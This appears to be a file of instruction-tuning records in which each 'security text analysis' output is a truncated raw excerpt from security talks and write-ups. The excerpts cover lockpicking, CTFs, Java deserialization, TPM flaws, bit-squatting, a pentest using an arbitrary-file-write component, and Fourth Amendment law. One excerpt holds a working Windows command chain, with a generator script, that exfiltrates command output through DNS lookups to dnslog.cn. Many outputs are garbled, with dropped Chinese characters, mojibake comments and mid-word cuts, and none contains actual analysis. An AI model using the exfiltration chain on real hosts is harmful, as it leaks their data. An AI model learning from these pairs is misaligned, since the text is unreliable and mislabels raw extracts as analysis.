{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon 19 august 4th-7th, 2011 Rio Hotel, Las Vegas Key Impressioning (working title, I guess theres still time to change this?) Jos Weyers H. Edward Tickel Jr. FBIs go-to NDE guy in the late 70s http://www.tresoroeffnung.de/buch.php THE #1 reference work Impressioning by Oliver Diederichsen How long can I stand in front of your server room without being questioned? 2 seconds? one minute? ten? Two seconds, twice a day, for about a week? Demo 2006 5:35 2007 5:19 2008 5:32 2009 4:23 2009 1:27 2010 0:57 2011 1:23 Series1 0 50 100 150 200 250 300 350 1 2 3 4 5 6 Series1 KJS tool by Jord Knaap Want more ? Books Impressioning by Oliver Diederichsen (www.tresoroeffnung.de) Practical Lockpicking by Deviant Ollam High Security Mechanical Locks by Graham Pulford Locks, Safes, & Security by Marc Tobias Videos Online YouTube & Google http://connect.waag.org/toool http://deviating.net/lockpicking/videos Other Informative Sites http://toool.nl http://toool.us http://blackbag.nl http://deviating.net/lockpicking http://lockpicking101.com http://security.org http://stormlockpicks.com http://openlocksport.com http://securitysnobs.com Thanks to: Deviant Ollam lock animations Barry Wels pictures from blackbag.nl Oliver Diederichsen excerpts from his book Jord Knaap KJS tool Encore: impressioning visually step-by-step Uncut key Key after the KJS treatment cut to the 1-1-1-1-1 position mark on position 2 (begin counting at shoulder) Close-up of mark (reflection) 12112 (after jiggle) mark distorts reflection on position 2 13112 again a mark on position 2 14112 yet again position 2 different angle (the dark spot) the key does turn, but only with force tiny mark on position 5 And a big crater-mark on position 2 same mark, different angle again same mark yet again  (can you tell, I like crater-marks?) like, really like them working key same key, cleaned up (code 15112)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# DoSaTTaCK * Category: Reverse Engineering * 1200 Points * Solved by the JCTF Team ## Description > What is this file and how can it help you get the flag? Attached was a file called `challenge.flp`. ## Solution Let's inspect this file: ```console root@kali:/media/sf_CTFs/bsidestlv/DoSaTTaCK# file challenge.flp challenge.flp: DOS/MBR boot sector, code offset 0x58+2, OEM-ID \"WINIMAGE\", sectors/cluster 2, root entries 112, sectors 640 (volumes <=32 MB), Media descriptor 0xfd, sectors/FAT 1, sectors/track 8, serial number 0x22550c8e, label: \" \", FAT (12 bit), followed by FAT ``` This looks like an image of a floppy disk, 7Zip can usually extract these files: ```console root@kali:/media/sf_CTFs/bsidestlv/DoSaTTaCK# 7z e challenge.flp 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_IL,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Core(TM) i5-4330M CPU @ 2.80GHz (306C3),ASM,AES-NI) Scanning the drive for archives: 1 file, 327680 bytes (320 KiB) Extracting archive: challenge.flp -- Path = challenge.flp Type = FAT Physical Size = 327680 File System = FAT12 Cluster Size = 1024 Free Space = 266240 Headers Size = 7168 Sector Size = 512 ID = 575999118 Everything is Ok Folders: 2 Files: 3 Size: 52676 Compressed: 327680 root@kali:/media/sf_CTFs/bsidestlv/DoSaTTaCK# ls -al drwxrwx--- 1 root vboxsf 4096 Jun 21 13:08 . drwxrwx--- 1 root vboxsf 4096 Jun 20 19:23 .. -rwxrwx--- 1 root vboxsf 327680 Jun 11 19:10 challenge.flp -rwxrwx--- 1 root vboxsf 17216 Apr 6 1992 CLIENT.EXE -rwxrwx--- 1 root vboxsf 11892 Sep 26 1987 MAIN.ENC -rwxrwx--- 1 root vboxsf 23568 Apr 6 1992 SERVER.EXE ``` We have three pretty old executable files (dated 1987 and 1992): ```console root@kali:/media/sf_CTFs/bsidestlv/DoSaTTaCK# file CLIENT.EXE CLIENT.EXE: MS-DOS executable, NE for MS Windows 3.x root@kali:/media/sf_CTFs/bsidestlv/DoSaTTaCK# file SERVER.EXE SERVER.EXE: MS-DOS executable, NE for MS Windows 3.x root@kali:/media/sf_CTFs/bsidestlv/DoSaTTaCK# file M", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroduction to CTF Traditional Course Practice  More theory and basic concept, but less practice and lab  Offensive Thinking  Think like a hacker Real World Attack  Overall attack life cycle  Reconnaissance  Gaining Access  Maintain Access  Clearing Tracks  Need to cope with many fussy work  Most security issue  Too simple to find  Too complex The other way for security training  CTF as the training for offensive security  Spread security techniques  Measure security skill  Practice, practice and more practice  Emulate real world problems  Environment close to real environment  Eliminate the boring task and focus on advanced security skill Capture the Flag  The competition to steal data, a.k.a flag, from other computers  EX. Steal admin password from a web server  Most problems are related to information security  Good practice for students and even the experts CTF  Starting from Defcon 4 in 1996  Format is a mystery...  Held every year since 1996  The most important CTF now  UCSB iCTF first held in 2001  The first CTF be held by academic organization CTF around the world  To enhance education of offensive security, CTFs are held in many country  U.S: DEFCON, Ghost In the Shellcode, PlaidCTF CTF around the world  To enhance education of offensive security, CTFs are held in many country  Japan: SECCON, TMCTF, MMACTF CTF around the world  To enhance education of offensive security, CTFs are held in many country  Korea: CodeGate, SECUINSIDE CTF around the world  To enhance education of offensive security, CTFs are held in many country  China: XCTF, BCTF, 0CTF, .. CTF around the world  To enhance education of offensive security, CTFs are held in many country  Russia: RuCTF  France: Nuit du Hack CTF  Malaysia: HITB CTF  Colombia: Backdoor CTF CTFTime  Created by kyprizel (MSLC) in 2010  Centralize ranking and statistic website Trend of CTFs  CTF contest  Less than 10 in 2010  More than 50 CTFs in 2014  CTF teams  More than 6000 teams in 2014  Many famous teams Famous CT", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJava反序列化漏洞 - 1.从URL类的个bug 说起 1 Java反序列化漏洞 - 1.从URL类的 个bug 说起 URL 类的个远古bug Java 的URL 类有个很好玩的bug当你调它的hashCode()法时会发起次DNS 解析例如当你往HashSet 添加个URL元素时会触发URL 的hashCode() 法较 元素然后发出个DNS 请求 Java反序列化漏洞 - 1.从URL类的个bug 说起 2 这个bug 源于URL 的个错误实现早在2001 年已经有反馈给oracle我们现在还能 在Oracle 的java bug 反馈平台看到当时的bug report 记录 当时有好个同时反馈了这个问题 其中个表怎么我调个简单的 hashCode() 法花了20秒 以及怎么我两个url 不样调equals 较返回true 这是因为URL 类在计算hashCode 的时候发起了DNS 请求获取ip并且通过ip地址来 较两个URL 对象是否equals实现这功能的程师应该是这么想的较两个URL 是否相等时应该较它们的ip 地址 oracle 收到bug 反馈后最后的结论是不处理因为需要向后兼容但他们提供了个新 的URI 类来避免这个问题 Unfortunately, changing the behavior now would break backward compatibility in a serious way, plus Java Security mechanism Java反序列化漏洞 - 1.从URL类的个bug 说起 3 depends on it in some parts of the implementation. We can't change it now. 这错误实现看起来没有什么处没想到多年后便了安全研究员 反序列化简介 所以URL 类跟反序列化漏洞有什么关系当然有关系 下先介绍下反序列化 简单来说序列化就是把对象存到件反序列化就是从件读取个对象代码运 时对象是在内存的运结束内存的对象就没有了为了可以持久化需要存到 件 序列化 Employee employee = new Employee(); FileOutputStream fileOutputStream = new FileOutputStream(\"/tmp/employee.ser\"); ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream); objectOutputStream.writeObject(employee); objectOutputStream.close(); fileOutputStream.close(); 反序列化 FileInputStream fileInputStream = new FileInputStream(\"/tmp/employee.ser\"); ObjectInputStream objectInputStream= new ObjectInputStream(fileInputStream); Employee employee = (Employee) in.readObject(); objectInputStream.close(); fileInputStream.close(); 写到件的是进制数据我们还可以使readObject 法和writeObject 法来 定义对象的哪些内容需要序列化 readObject 和writeObject 是约定俗成的法不是哪个接定义的法Java 在序列 化和反序列化时会通过反射去寻找它们如果存在会直接调 Java反序列化漏洞 - 1.从URL类的个bug 说起 4 private void writeObject(ObjectOutputStream out) throws IOException; private void readObject(ObjectInputStream ins) throws IOException, ClassNotFoundException; 如果在反序列化调readObject 的时候readObject 有些危险的代码漏洞就形 成了 以URL 类为例个以URL 为key 的HashMap在反序列化时会调URL 的hashCode 法触发个DNS 请求 也就是说我们可以让标服务器发个DNS 请求如果我们收到了这个dns 志可以 证明反序列化漏洞存在 探测是否存在反序列化漏洞 我们可以这个bug 来探测是否存在反序列化漏洞 1.先成序列化件 Map<URL, String> map = n", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAuthor: 远海@websecuritys.cn 0x01:前言 最近忙着复习,所以很少关注安全这块了本次是针对自己学校某系统的渗透记录,已获得相应授 权通用漏洞涉及影响单位早前已提交至SRC平台,厂商以发布对应补丁 0x02:信息收集 目标系统主要是一个支付平台,是近期刚上线的系统,向学校老师取得相应授权后开始测试 软件开发商:`xx软件开发有限公司/xxsoft/xxxx.com.cn` 开发语言: `Java` 框架: `St2` 因为是近期刚上线的系统,单点认证还没有接入无法通过单点认证登录此系统,在尝试爆破 admin 密码后无果. 开始转向源码的收集毕竟白盒才是最直接的手段源码的收集大致有以下几个思路: 1.百度云盘 2.闲鱼 (部分商家已搭建第三方系统为主可能有存货需要主动询问) 3.同系统站点下存在备份 百度云盘和闲鱼比较费时间,这两个主要看自身对关键词的理解因为这两个思路基本被人玩的差不多了也就 不在浪费时间了(后面找了下也确实没有)先确定了该系统的指纹,使用 fofa 收集相同系统站点 然后丢进御剑里走一遍字典如下: /ROOT.7z /ROOT.rar /ROOT.tar /ROOT.tar.gz /ROOT.war /ROOT.zip /web.tar /web.tar.gz /web.rar 这里其实需要注意.很多情况是 tomcat 下部署了多个应用在不同目录中,而 ROOT 目录中只是几个简单的重定 向 文件所以在扫描多应用站点时,应该把 ROOT 改成应用所处目录名. 如: /pay/index.jsp-- > /pay/ --> pay.war 上面这套思路纯粹看运气.结果也是没有扫到. 0x03:某组件存在安全问题 备份走不通只能走一些历史漏洞了把url列表丢进自己写的轮子里扫一遍: (先是扫了一次目录,后根据目录再次 验证) 发现 ticket 模块下存在 officeserver.jsp ,访问后出现提示 DBSTEP V3.0 0 14 0 请使用Post方法 典型的某格组件,该组件默认存在 SAVEASHTML 方法,攻击者构造特殊的数据包可以造成任意文件的写入: 并且默 认使用 Base64 加密,主要问题在于数据包的构造: 一张图简单了解下具体格式. (别喷,我自己也看不懂) **解释: ** 具体参考 DbStep.jar 中的 StreamToMsg 方法这里只做简单的解释 数据包的前64字节为配置信息,告诉后端该 如何读取,也就是0-63位 其中 0:15 赋值给变量 FVersion , 16:31 赋值给变量 BodySize , 32:47 赋值给 ErrorSize . 48:63 赋值给 FFileSize .除了 FVersion ,其余中间内容只能填写数字,代表着各个变量的内容要 读取多少位. 以 BodySize 为例子,这里的内容为 114 ,也就是说去除数据前64字节,在往后读114字节.这114字 节内容赋值给 FMsgText .之后取参数也是从 FMsgText 中取每个参数以 \\n\\t 进行分割 以此类推. 了解如何构造对应数据包后开始编写脚本: 该组件默认会有一个 SAVEASHTML 方法可以将 FFileSize 截取的内容存储到文件中导致任意文件的写入 else if (mOption.equalsIgnoreCase(\"SAVEASHTML\")) { // ĴΪOFFICEΪHTMLҳ mHtmlName = MsgObj.GetMsgByName(\"HTMLNAME\"); // ȡļ mDirectory = MsgObj.GetMsgByName(\"DIRECTORY\"); //ȡĿ¼ MsgObj.MsgTextClear(); if (mDirectory.trim().equalsIgnoreCase(\"\")) { mFilePath = mFilePath + \"\\\\HTML\"; } else { mFilePath = mFilePath + \"\\\\HTML\\\\\" + mDirectory; } MsgObj.MakeDirectory(mFilePath); // if (MsgObj.MsgFileSave(mFilePath + \"\\\\\" + mHtmlName)) { // HTMLļ MsgObj.MsgError(\"\"); // Ϣ MsgObj.SetMsgByName(\"STATUS\", \"HTMLɹ!\"); // Ϣ } else { MsgObj.MsgError(\"HTMLʧ!\"); // ôϢ } MsgObj.MsgFileClear(); } 当文件夹不存在时会自动创建对应的文件夹 MsgF", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDisclaimer: This presentation is based upon personal research that was not supported or authorized by my employer. The material being presented may be considered offensive to those with weak hearts, a sense of ethics, or those highly invested in technology funds. Robert Stucke bobx@rot26.net DNS Has Been Found To Be Hazardous To Your Health Use With Caution About Me Phoenix @ 90K feet! Agenda  DNS Bit-Squatting  Misunderstood end-point DNS behavior  You dont own that domain, I do  Abandoned Botnets and Forgotten Toys Bit-Squatting Presented by Artem Dinaburg at Blackhat and Defcon in 2011  Project Page http://dinaburg.org/bitsquatting.html  Presentation Video http://youtu.be/lZ8s1JwtNas  Presentation Slides http://dinaburg.org/data/DC19_Dinaburg_Presentation.pdf Bit-Squatting  What is it?  Why does it happen?  What is the impact? Bit-Squatting Bit-Squatting 0110011101101111011011110110 0110011101101101011011110110 Bit-Squatting What is Bit-Squatting?  Anticipate the way a single bit error in memory will corrupt the DNS name  Registering those mangled domains  Rapture, Mayhem, Yay! Bit-Squatting 01100111011011110110111101100111011011000110010100101110011000110110111101101101 01100111011011110110111101100110011011000110010100101110011000110110111101101101 google.com goofle.com Bit-Squatting What causes these memory errors?  Heat  Electrical Problems  Radioactive Contamination  Cosmic Rays! Bit-Squatting Phones Bit-Squatting The guidance we give to data center operators is to raise the thermostat.  Many data centers operate at 70 degrees or below. Wed recommend looking at going to 80 degrees - Erik Teetzel Energy Program Manager at Google The peak operating temperature Googles Belgium data center reaches is 95 degrees Fahrenheit! Bit-Squatting Bit-Squatting gstatic.com Google domain for serving static content CSS Images Javascript XML Bit-Squatting gstatic.com fstatic.com estatic.com cstatic.com ostatic.com wstatic.com grtatic.com gqtatic.com gwtatic.com gctatic.com g3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n信誉危机 广受认可的硬件和软件遭遇信任危机 Seunghun Han 国家安全研究所高级安全研究员 29 May 2019 - NSR韩国国家安全研究所高级安全研究员 - Black Hat Asia 2019影响力成员 - KIMCHICON审查委员会成员 - 作为演讲嘉宾出席以下会议 - USENIX Security 2018 - Black Hat Asia 2017 - 2019 - HITBSecConf 2016 - 2017 - BeVX and KIMCHICON 2018 - 64-bit multi-core OS principles and structure, Vol. 1 and Vol. 2)的作者 - a.k.a kkamagui @kkamagui1 我是谁? - 介绍一个关于信誉的刻板印象  信誉并不代表值得信赖  不幸的是由于信誉我们很容易相信某些东西 - 列举信誉厂商令人失望的案例  BIOS / UEFI固件和可信平台模块TPM由值得信赖的 公司制作  但是我发现了两个漏洞CVE-2017-16837和CVE- 2018-6622可以破坏TPM - 提出了对策以及我们所需要做的  不要基于信誉而轻信眼见为实自己动手检查 本演讲的目标 以前的工作 信誉 基于 信任! 我们只相信 值得信赖 的公司出产的 产品 信誉良好的公司 (高价) 其他公司 (低价) 您的 仅供演示! 信誉良好的公司 (高价值) 其他公司 (低价值) 您的 仅供演示! I KNOW WHAT YOU DID FOR THE PRESENTS! 值得信赖的要素 衡量信任的根源 核心 RTM 信誉良好的 产品 真的 值得信任吗? 信誉 可信! 每个人都有一个计划, 直到他们脸上挨了一拳 - 迈克 泰森 每个人都有一个计划 直到他们脸上挨了一拳 - 迈克 泰森 每个研究者 都有一个计划 直到遇到他们的经理 - 佚名 你 每个研究者 都有一个计划 直到遇到他们的经理 - 佚名 经理 CEO 时间轴 ~~ Happiness 0 5 10 - 10 - 5 - 1000 - 100 2017 2018 2019 Time (year) 首次遭遇 再次遭遇 CVE-2017- 16837 CVE-2018- 6622 USENIX Security Black Hat Asia Black Hat Asia with Napper ~~ Happiness 0 5 10 - 10 - 5 - 1000 - 100 2017 2018 2019 Time (year) 首次遭遇 二次遭遇 CVE-2017- 16837 CVE-2018- 6622 USENIX Security Black Hat Asia Black Hat Asia with Napper 内容 - 背景 可信计算组织TCG - 定义全球行业规范和标准 - 英特尔AMDIBM惠普戴尔联想微软思科 瞻博网络和英飞凌等知名公司均为其成员 - 支持硬件信任根 - 可信平台模块TPM是核心技术 - TCG技术已应用于统一可扩展固件接口UEFI TCG的可信计算基TCB - 是主机平台上的软件和硬件集合 - 管理和执行系统的安全策略 - 能够防止自己受到入侵 - 可信平台模块TPM有助于确保TCB正确实例化并值得 信赖 可信平台模块TPM(1) - 是防篡改设备 - 拥有自己的处理器RAMROM和 非易失性RAM - 它有自己的与系统分开的独立状态 - 提供加密和累积测量功能 - 测量值累积到平台配置寄存器PCR0~23 可信平台模块TPM(2) - 用于通过调查存储在PCR中的值来确定系统的可信度 - 可以使用本地验证或远程证明 - 用于根据特定的PCR值限制对秘密数据的访问 - 密封操作利用TPM的PCR加密秘密数据 - 只有当PCR值与特定值匹配时Unseal操作才能解密密封 数据 测量信任的根源RTM - 向TPM发送与完整性相关的信息测量 - TPM将测量结果累积到具有PCR中先前存储的值的PCR - CPU是否由Core RTMCRTM控制 - 当建立新的信任链时CRTM是第一组指令 Extend: PCRnew = Hash(PCRold || Measurementnew) 静态和动态RTMSRTM和DRTM - 当主机平台在POWER-ON或RESTART启动时SRTM由静态 CRTMS-CRTM启动 - DRTM由动态CRTMD-CRTM在运行时启动无需平台重 置 - 在将控制传递给它们前它们将组件的测量值散列扩展到 PCR : 将下一个代码的哈希扩展到TPM 执行下一个代码 BIOS/UEFI 固件 BIOS/UEFI Code TPM Boot", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nscapytcp 0x00 natgettcpnat wendellh.323TCPTCPFTP scapytcpscapy 0x01 scapy https://scapy.readthedocs.io/en/latest/ demo https://akaljed.wordpress.com/2010/12/12/scapy-as-webserver/ demo #!/usr/bin/python from scapy.all import * # Interacts with a client by going through the three-way handshake. # Shuts down the connection immediately after the connection has been established. # Akaljed Dec 2010, http://www.akaljed.wordpress.com # Wait for client to connect. a=sniff(count=1,filter=\"tcp and host 192.168.1.1 and port 80\") # some variables for later use. ValueOfPort=a[0].sport SeqNr=a[0].seq AckNr=a[0].seq+1 # Generating the IP layer: ip=IP(src=\"192.168.1.1\", dst=\"192.168.1.2\") # Generating TCP layer: TCP_SYNACK=TCP(sport=80, dport=ValueOfPort, flags=\"SA\", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)]) #send SYNACK to remote host AND receive ACK. ANSWER=sr1(ip/TCP_SYNACK) # Capture next TCP packets with dport 80. (contains http GET request) GEThttp = sniff(filter=\"tcp and port 80\",count=1,prn=lambda x:x.sprintf(\"{IP:%IP.src%: %TCP.dport%}\")) AckNr=AckNr+len(GEThttp[0].load) SeqNr=a[0].seq+1 # Print the GET request # (Sanity check: size of data should be greater than 1.) if len(GEThttp[0].load)>1: print GEThttp[0].load # Generate custom http file content. html1=\"HTTP/1.1 200 OK\\x0d\\x0aDate: Wed, 29 Sep 2010 20:19:05 GMT\\x0d\\x0aServer: Testserver\\x0d\\x0aConnection: Keep- Alive\\x0d\\x0aContent-Type: text/html; charset=UTF-8\\x0d\\x0aContent-Length: 291\\x0d\\x0a\\x0d\\x0a<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0//EN\\\"><html><head><title>Testserver</title></head><body bgcolor=\\\"black\\\" text=\\\"white\\\" link =\\\"blue\\\" vlink=\\\"purple\\\" alink=\\\"red\\\"><p><font face=\\\"Courier\\\" color=\\\"blue\\\">-Welcome to test server----------- --------------------</font></p></body></html>\" # Generate TCP data data1=TCP(sport=80, dport=ValueOfPort, flags=\"PA\", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)]) # Construct whole network packet, send it and fetch the returning ack. ackdata1=sr1(ip/data1/html1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows下DNS出的命令回显技巧.md 2022/6/30 1 / 9 Windows下DNS出的命令回显技巧 最近遇了很多仅DNS出的极限环境简单研究了个还算通的利DNSLog的回显Trick全当抛砖引 不喜勿喷 0x00 前 在实战中命令执总能遇各种各样的环境回显且仅DNS出的环境也能占个多数仅DNS出的 环境般利编码+DNSLog就可以解决回显问题 通指的是在server2003powershell环境也能 windows带的encode只有certutil Windows下DNS出的命令回显技巧.md 2022/6/30 2 / 9 certutil带了base64和hex两种encode法 0x01 base64-encode存在的问题 特殊字符+/ powershell环境处理替换常麻烦 单度dns域名度限制63个certutil-encode后单字符度为64需要将分割为两段带 出powershell需要cmdshell套循环操作分繁琐 云服务器DNS问题 Windows下DNS出的命令回显技巧.md 2022/6/30 3 / 9 腾讯云的DNS服务器存在强转写问题头没阿服务器不过测试了阿的DNS223.5.5.5也存在 样的问题 以上原因在我研究的时候最终放弃了base64-encode的案尤其是最后条强转写的问题 0x02 hex-encode案 先看encode结果 对base64的主要优点 特殊字符 单度为32字符 需考虑写 需考虑不同条数数据外带存在延时外带记录会带出前4位表示数据位置的字符0000 但是次dns只能带出来16个字符回显效率有点低 Windows下DNS出的命令回显技巧.md 2022/6/30 4 / 9 接下来只需要利cmdshell语法将中间的字符取出来即可 for /f \"tokens=1-17\" %a in (result.txt) do echo %a%b%c%d%e%f%g%h%i%j%k%l%m%n%o%p%q 在encode的最后可能因为字符不导致存在特殊字符 在写的命令txt后追加部分字符后再encode即可解决此问题 just like: ipconfig > ipconfig &&echo 11111111111>>ipconfig 最后DNSLog记录会以0d0a3131结尾很容易判断了 最终命令: command > command &&echo 11111111111>>command && certutil -encodehex command command.txt && for /f \"tokens=1-17\" %a in (command.txt) do start /b ping -nc 1 %a%b%c%d%e%f%g%h%i%j%k%l%m%n%o%p%q.command.dnslog.cn && del command && del command.txt 0x03 动化 因为外带的数据条数实在太就顺便动化下 个成命令另个脚本来监听dnslog平台并做格式化输出 CommandGen.py Windows下DNS出的命令回显技巧.md 2022/6/30 5 / 9 import sys commandTem = r'command > command7 &&echo 11111111111>>command7 && certutil -encodehex command7 command7.txt && for /f \"tokens=1-17\" %a in (command7.txt) do start /b ping -nc 1 %a%b%c%d%e%f%g%h%i%j%k%l%m%n%o%p%q.command.{0} && del command7 && del command7.txt' with open('config617', 'r') as f: command = commandTem.format(f.readlines()[0]) if __name__ == '__main__': if len(sys.argv)<2: print('usage: python3 CommandGen.py Yourcommand No(start)') print('like: python3 CommandGen.py whoami (Command will use \"start\".Start will Send a large number of requests in a short period of time, resulting in lost DNSLog record)') print('like: pyt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 代理实验 > 注 : 笔记中拓扑图 xmind 源文件在其图片目录下 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **相关文章** - [终于有人把正向代理和反向代理解释的明明白白了](https://cloud.tencent.com/developer/article/1418457) - [谈谈我所了解的WEB代理](https://www.freebuf.com/articles/web/181723.html) - [红队第9篇给任意java程序挂Socks5代理方法](https://mp.weixin.qq.com/s/pVAZvKADFVwPOC4CwrCooQ) **相关利用案例** - [代理配置不当](../../Web安全/Web_Generic/Web_Generic.md#代理配置不当) --- ## 正向代理 正向代理forward proxy是一个位于客户端和目标服务器之间的服务器(代理服务器)为了从目标服务器取得内容客户端向代理服务器发送一个请求并指定目标然后代理服务器向目标服务器转交请求并将获得的内容返回给客户端 这种代理其实在生活中是比较常见的比如访问外国网站技术其用到的就是代理技术 有时候用户想要访问某国外网站该网站无法在国内直接访问但是我们可以访问到一个代理服务器这个代理服务器可以访问到这个国外网站这样呢用户对该国外网站的访问就需要通过代理服务器来转发请求并且该代理服务器也会将请求的响应再返回给用户这个上网的过程就是用到了正向代理 所以正向代理其实是\"代理服务器\"代理了\"客户端\"去和\"目标服务器\"进行交互 --- ### 代理池 **相关工具** - [kitabisa/mubeng](https://github.com/kitabisa/mubeng) - An incredibly fast proxy checker & IP rotator with ease. **相关资源** - [zu1k/proxypool](https://github.com/zu1k/proxypool) - [safe6Sec/proxyServer](https://github.com/safe6Sec/proxyServer) - [Mustard404/Auto_proxy](https://github.com/Mustard404/Auto_proxy) - 利用IP地址池进行自动切换Http代理防止IP封禁 - [sh3d0ww01f/WaterDragon](https://github.com/sh3d0ww01f/WaterDragon) - 用GithubAction实现代理功能,一次一个ip - [ustayready/fireprox](https://github.com/ustayready/fireprox) - AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation **相关文章** - [说说代理池](https://xz.aliyun.com/t/7718) - [红狗利器IP代理池](https://www.freebuf.com/sectool/332623.html) #### 云函数实现代理池 - [浅谈云函数的利用面](https://xz.aliyun.com/t/9502) - [shimmeris/SCFProxy](https://github.com/shimmeris/SCFProxy/) - 一个利用云函数实现各种功能的工具 - [利用腾讯云函数搭建免费代理池(搭建过程)](https://www.freebuf.com/sectool/332903.html) - [利用云函数搭建免费代理池](https://www.cnblogs.com/supdon/p/15099742.html) ### clash **相关文章** - [用 Clash 做代理](https://maintao.com/2021/use-clash-as-a-proxy/) - [Clash实现IP秒级切换(含简易源码分析)](https://segmentfault.com/a/1190000040828310) - [Clash 学习四在 Clash 中配置使用 HTTP 协议或 SOCKS5 协议的节点](https://senjianlu.com/2021/11/clash-note-04/) ##", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThey took my laptop! The Fourth Amendment explained Disclaimer  It is vitally important for you to understand that while I am an attorney, I am not your attorney.  In no way, shape, or form is this presentation intended to provide you with legal advice.  Before relying or acting upon any information learned from this presentation you should consult a licensed attorney in your State. Introduction Overview  The Constitution  Intro to the Fourth  Suspicion Standards  Exceptions  They took my laptop!  Hypothetical applications  Modern case overviews  Question & Answer Period The Constitution Pop Quiz Hot Shots The Constitution Quiz  Q: How many Articles does the constitution contain?  A: 7 + Preamble, Signatures The Constitution Quiz  Q: How many amendments are there?  A: 27 The Constitution Quiz  Q: The first ten amendments are called?  A: The bill of rights The Constitution Quiz  Q: Which article applied most of the bill of rights to the states?  A: 14th Amendment. The Constitution Quiz  Q: Which article or amendment contains the section on privacy?  A: None. Its a judicial fiction. The Constitution Quiz  Q: When was the last amendment to the constitution ratified?  A: May 7th, 1992 The Constitution Quiz  Q: When was it proposed?  A: September 25th, 1789 - James Madison The Constitution Quiz  Q: President Barack Obama was a professor of ____ law?  A: Constitutional Law Back to the point Introduction to The Fourth The Fourth Amendment  The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched, and the persons or the things to be seized. Amendment IV Two separate clauses  Reasonableness Clause  The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violate", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeb Web安全威脅偵測與防護 安全威脅偵測與防護 Roger Chiu Roger Chiu 邱春樹 邱春樹 Malware Malware--Test Lab Test Lab http://www.malware http://www.malware--test.com test.com PDF created with pdfFactory Pro trial version www.pdffactory.com 訓練大綱 訓練大綱 u u 相關新聞報導 相關新聞報導 u u 網站被植入惡意程式之展示 網站被植入惡意程式之展示 u u 2007 2007年 年OWASP OWASP十大 十大Web Web資安漏洞 資安漏洞 u u 網站被植入惡意程式之手法 網站被植入惡意程式之手法 u u 網站被植入惡意程式之偵測 網站被植入惡意程式之偵測 u u 網站被植入惡意程式之防護 網站被植入惡意程式之防護 u u 總結 總結 PDF created with pdfFactory Pro trial version www.pdffactory.com 相關新聞報導 相關新聞報導 u u 2007 2007年 年55月 月21 21日 日Google Google研究報告指出 研究報告指出全 全 球十分之一網站潛藏惡意連結或程式碼 球十分之一網站潛藏惡意連結或程式碼  這些網站含有偷渡式下載 這些網站含有偷渡式下載(Drive (Drive--by by Downloads Downloads之惡意程式 之惡意程式 PDF created with pdfFactory Pro trial version www.pdffactory.com 網站被植入惡意程式之展示 網站被植入惡意程式之展示 u u Web Web資安威脅實例展示 資安威脅實例展示(DEMO) (DEMO) PDF created with pdfFactory Pro trial version www.pdffactory.com 2007 2007年 年OWASP OWASP十大 十大Web Web資安漏洞 資安漏洞 u u Cross Cross--Site Scripting (XSS) Site Scripting (XSS) u u Injection Flaw Injection Flaw u u Malicious File Execution Malicious File Execution u u Insecure Direct Object Reference Insecure Direct Object Reference u u Cross Cross--Site Request Forgery (CSRF) Site Request Forgery (CSRF) u u Information Leakage and Improper Error Information Leakage and Improper Error Handling Handling u u Broken Authentication and Session Management Broken Authentication and Session Management u u Insecure Cryptographic Storage Insecure Cryptographic Storage u u Insecure Communication Insecure Communication u u Failure to Restrict URL Access Failure to Restrict URL Access PDF created with pdfFactory Pro trial version www.pdffactory.com 與程式碼安全品質有關的 與程式碼安全品質有關的OWASP OWASP Web Web資安漏洞 資安漏洞 u u Cross Site Scripting (XSS) Cross Site Scripting (XSS)  跨站腳本 跨站腳本 攻擊 攻擊 u u Injection Flaws Injection Flaws  注入弱點 注入弱點 u u Malicious File Execution Malicious File Execution惡意檔案執行 惡意檔案執行 u u Insecure Direct Object Reference Insecure Direct Object Reference 不 不 安全的物件參考 安全的物件參考 u u Cross Site Request F", "category": "text_analysis", "source": "security_papers"}
